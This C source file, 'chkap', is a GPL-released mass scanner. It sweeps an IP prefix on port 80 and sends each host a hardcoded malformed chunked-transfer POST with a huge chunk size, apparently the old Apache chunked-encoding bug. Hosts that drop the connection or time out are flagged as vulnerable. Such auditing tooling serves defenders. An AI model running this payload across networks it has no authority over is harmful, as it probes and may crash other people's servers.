/*

Written by Vasil Kolev, vasil@ludost.net

avialable at http://ludost.net/chkap.tgz

Released under GPL, http://www.fsf.org/licenses/gpl.html

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <time.h>

#include <errno.h>

#include <string.h>

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <fcntl.h>

char *XPLT="POST /hello-admin.html HTTP/1.1\nHost: tester.vulnerability.apache.org\nTransfer-Encoding: chunked\n\n80000001\nboza\n0\n";



/* yes, i'm lazy */
#define SALLOC (struct srv *) malloc(sizeof(struct srv));

#define MARK(x) close(x);x=-1

#define MAXCONCURENT 100

#define TIMEOUT 30
#define TIMEOUTSEL 1

struct srv
{
	int fd;
	int state; /* 0 - unconnected, 1 - connecting , 2 - writing, 3- receiving 4 - timed out*/
        size_t pos;
	uint32_t addr;
        int avialable;
	char readbuff[2048];
        time_t stamp;
	struct srv *next;

};


void usage()
{
	fprintf(stderr,"Usage: chkap IPPREFIX\nWhere IPPREFIX is in the form 192.168.0.0/24\n");
        exit(2);
}


void build_prefix_masks(int len,uint32_t *mask, uint32_t *revmask)
{
	int i;

        (*mask)=0;
	for (i=0;i<len;i++)
	{
		++(*mask);
		(*mask)*=2;
	}
        (*revmask)=1;
	for (i=len+1;i<32;i++)
	{
		(*mask)*=2;
                (*revmask)*=2;
	}
        (*revmask)*=2;
        (*revmask)--;
}

void parse_arg(char *pref, uint32_t *beg, uint32_t *end)
{
	uint32_t mask,revmask;
        int masklen;
        struct in_addr inp;
	char *cp1,*tmp;


	cp1=(char *)malloc(strlen(pref)+2);
	strcpy(cp1,pref);
	tmp=strchr(cp1,'/');
	if(tmp==NULL)
	{
                usage();
	}
	else
	{
                *tmp=0;
	}

	if(inet_aton(cp1,&inp)==0) usage();
        inp.s_addr=ntohl(inp.s_addr);
	strcpy(cp1,pref);
	tmp=strchr(cp1,'/')+1;
	masklen=atoi(tmp);
	if( (masklen<8) || (masklen>32) ) usage(); /* bad prefix */

	if(masklen<31)
	{
		build_prefix_masks(masklen,&mask,&revmask);
		*beg=inp.s_addr & mask;
		*end=*beg + revmask;
	}
	else
	{
		*beg=inp.s_addr;
                *end=inp.s_addr+1;
	}

}



void vulnerable (struct srv *serv)
{
	struct in_addr tmp;

        tmp.s_addr=ntohl(serv->addr);
	printf("Vulnerable: %s\n",inet_ntoa(tmp)); /* finish this*/
        MARK(serv->fd);
}


void init_srv(struct srv *tmp)
{
	unsigned long flags;

	tmp->next=NULL;
	tmp->state=0;
	tmp->pos=0;
	tmp->avialable=0;
	memset(tmp->readbuff,0,2048);
	tmp->fd=socket(AF_INET,SOCK_STREAM,0);
	flags=fcntl(tmp->fd,F_GETFL);
	flags|=O_NONBLOCK;
	fcntl(tmp->fd,F_SETFL,flags);

}





int main(int argc,char **argv)
{
	struct srv *mainlist=NULL,*tmp=NULL,*t1=NULL;
	int listsize=0;
        struct sockaddr_in httpserv;
        uint32_t addr_beg,addr_end; /* In host byte order, so we can easily do a '++' */

	size_t sz;
        struct timeval timeout;

        int i,maxdesc=0;



        fd_set rd,wr,xc;

	/* init */
	if(argc!=2) usage();
	++argv;
	parse_arg(*argv, &addr_beg, &addr_end);


        /* set stdout unbuffered,req by Boyan Krosnov*/
	setvbuf(stdout,NULL,_IONBF,0);

	//printf("%s\n",*argv);
	/*  we init the array */
        listsize=0;
	for (i=0;i<MAXCONCURENT;i++)
	{
		/* find add entry */
                if(addr_beg>=addr_end) break;
                listsize++;
		if (mainlist==NULL)
		{
			mainlist=SALLOC;
                        tmp=mainlist;
		}
		else
		{
                        tmp->next=SALLOC;
			tmp=tmp->next;
		}
                init_srv(tmp);
                tmp->addr=addr_beg++;
	}

        /* main select loop */
	for (;;)
	{
		FD_ZERO(&wr);
		FD_ZERO(&rd);
		FD_ZERO(&xc);

		tmp=mainlist;
		while (tmp!=NULL)
		{
                        maxdesc=0;
			if(tmp->fd==-1)
			{
                                tmp=tmp->next;
				continue;
			}
			switch(tmp->state)
			{
			case 0:
				{
					httpserv.sin_family=AF_INET;
					httpserv.sin_addr.s_addr=htonl(tmp->addr);
					httpserv.sin_port=htons(80);
					/*
					 there is a chance that connect() will return immediately, even
                                         if we're in noblocking mode, see UNPv1/W.Richard Stevens
					 */
					tmp->state++;
					if (connect(tmp->fd,(struct sockaddr *) &httpserv,sizeof(httpserv) )!=-1)
					{
                                                tmp->state++;
					} else
					{
						if( (errno!=EAGAIN) && (errno!=EINPROGRESS))
						{
							/* some kind of error occured */
							fprintf(stderr,"Error connecting to %s, %s\n",inet_ntoa(httpserv.sin_addr),strerror(errno));
							MARK(tmp->fd);
                                                        tmp->state=-1;
						}

					}
					if(tmp->fd!=-1)
					{
						FD_SET(tmp->fd,&wr);
						FD_SET(tmp->fd,&rd);
						tmp->stamp=time(NULL);
					}
					break;
				}
			case 1:

				if(tmp->avialable==1)
				{
					tmp->state++;
					//printf("connected %d\n",tmp->fd);
                                        FD_SET(tmp->fd,&wr);
				}
				else
				{
					FD_SET(tmp->fd,&wr);
					FD_SET(tmp->fd,&rd);
				}
				if ( time(NULL)-(tmp->stamp) > TIMEOUT )
				{
                                        fprintf(stderr,"Timed out connection %d\n",tmp->fd);
					MARK(tmp->fd);
				}
                                tmp->avialable=0;
				break;
			case 2:
				if (tmp->avialable==1)
				{
					sz=write(tmp->fd,&XPLT[tmp->pos],strlen(XPLT)-tmp->pos);
					if ( (sz==-1) && (errno!=EAGAIN) )
					{
                                                httpserv.sin_addr.s_addr=htonl(tmp->addr);
						fprintf(stderr,"Error writing to %s, %s\n",inet_ntoa(httpserv.sin_addr),strerror(errno));
                                                MARK(tmp->fd);
					}
					tmp->pos+=sz;
					if (tmp->pos>=strlen(XPLT))
					{
						tmp->state++;
						tmp->pos=0;
                                                tmp->stamp=time(NULL);
					}

                                        tmp->avialable=0;
				}
                                if ( (tmp->fd!=-1) && (tmp->state==2) ) FD_SET(tmp->fd, &wr);
				break;
			case 3:
				if (tmp->avialable==1)
				{
					sz=read(tmp->fd, &tmp->readbuff[tmp->pos], 2048- (tmp->pos) );
					if  (sz==0)
					{
						if (tmp->pos==0)
						{
							/* we're vulnerable, no doubt about it*/
							vulnerable(tmp);

						}
					}
                                        tmp->pos+=sz;
					MARK(tmp->fd);
                                        tmp->avialable=0;
				}
				else if ( time(NULL)-(tmp->stamp) > TIMEOUT ) vulnerable(tmp);

                                if (tmp->fd!=-1) FD_SET(tmp->fd,&rd);
				break;
			default:
				{
					fprintf(stderr,"Something's _REALLY_ wrong, dying (memtest86?) \n");
					exit(666);
					break;
				}

			} /* case */
//			printf("out of case \n");
			if(tmp->fd!=-1) FD_SET(tmp->fd, &xc);
			if(maxdesc<tmp->fd) maxdesc=tmp->fd;
			tmp=tmp->next;

		} /* while , for the descriptors */
		/*
                 clear pending descriptors
		 */
/*
		tmp=mainlist;
		while(tmp!=NULL)
		{
			printf("%d\n",tmp->fd);
                        tmp=tmp->next;
		}


		printf("Clear1 %d \n",listsize);
		*/
                maxdesc++;
		while (mainlist->fd==-1)
		{
			/* corner case*/
			tmp=mainlist->next;
			free(mainlist);
			mainlist=tmp;
			listsize--;
                        if(mainlist==NULL) break;
		};

//                printf("Clear2 %d \n",listsize);

                tmp=mainlist;
		while( (tmp!=NULL)  && (tmp->next!=NULL) )
		{

			t1=tmp->next;
			if(t1->fd==-1)
			{
				/* die */
				tmp->next=t1->next;
				free(t1);
                                listsize--;
			}
                        tmp=tmp->next;

		}
		timeout.tv_sec=TIMEOUTSEL;
                timeout.tv_usec=0;
		select(maxdesc,&rd,&wr,&xc,&timeout);
		/*
		 this isn't efective, optimise it
                 and duplicates code, yuk
                 */
		for (i=0;i<maxdesc;i++)
		{
			if (FD_ISSET(i,&rd) || FD_ISSET(i,&wr))
			{
				tmp=mainlist;
				while (tmp!=NULL)
				{
					if (tmp->fd==i)
					{
						tmp->avialable=1;
                                                break;
					}
                                        tmp=tmp->next;
				}
			}
			if(FD_ISSET(i,&xc))
			{
				tmp=mainlist;
				while (tmp!=NULL)
				{
					if (tmp->fd==i)
					{

                                                MARK(tmp->fd);
						break;
					}
                                        tmp=tmp->next;
				}
			}
		}


		/*
                 add new connections
		 */
		tmp=mainlist;
                while((tmp!=NULL) && (tmp->next!=NULL)) tmp=tmp->next;
		for(i=0;i<(MAXCONCURENT-listsize);i++)
		{
			if(addr_beg>=addr_end) break;
			if(tmp==NULL)
			{
				tmp=SALLOC;
                                mainlist=tmp;
			}
			else
			{
				tmp->next=SALLOC;
				tmp=tmp->next;
			}

			listsize++;
                        init_srv(tmp);
			tmp->addr=addr_beg++;


		}
/*      	printf("Listsize: %d addr_beg: %u addr_end %u\n",listsize,addr_beg,addr_end);*/
                if ( (listsize==0)  && (addr_beg>=addr_end) ) break;

	} /* for */

        return 0;

}
